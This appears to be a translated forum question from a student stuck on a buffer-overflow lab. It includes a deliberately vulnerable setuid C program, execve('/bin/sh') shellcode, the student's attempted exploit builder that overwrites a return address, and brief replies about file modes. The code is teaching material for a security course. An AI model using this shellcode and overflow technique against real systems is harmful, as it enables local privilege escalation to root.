我有一個實驗室任務,我被卡住了。我必須利用緩衝區溢出來生成具有root權限的shell。有兩個單獨的C文件:stack.c緩衝區漏洞問題 - 生成Shell
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[24];
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
和exploit.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
我只能編輯exploit.c。下面是我所做的修改:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(&buffer[486], shellcode);
long *ptr = (long *)(buffer+36);
*ptr = &shellcode;
buffer[sizeof(buffer)-1] = '\0';
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
我用它來執行命令是這樣的:
$ su root
$ Password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack
這應該更換回位地址是一個與當我打電話堆殼。利用編譯和運行很好,但是當我進入堆棧時,它會發生分段錯誤。我知道它會讀取文件並分配所有的值,但我不知道爲什麼當它到達該地址時不會重定向到shellcode。有誰知道爲什麼它可能不會生成shell?
您正在使用fwrite()和fread(),因此,您應該使用fopen()分別以二進制模式打開文件 - 'wb'和'rb'。否則,對文件使用fprintf()和fscanf()作爲文本模式(非二進制模式)。 – cm161
請格式化您的代碼。 –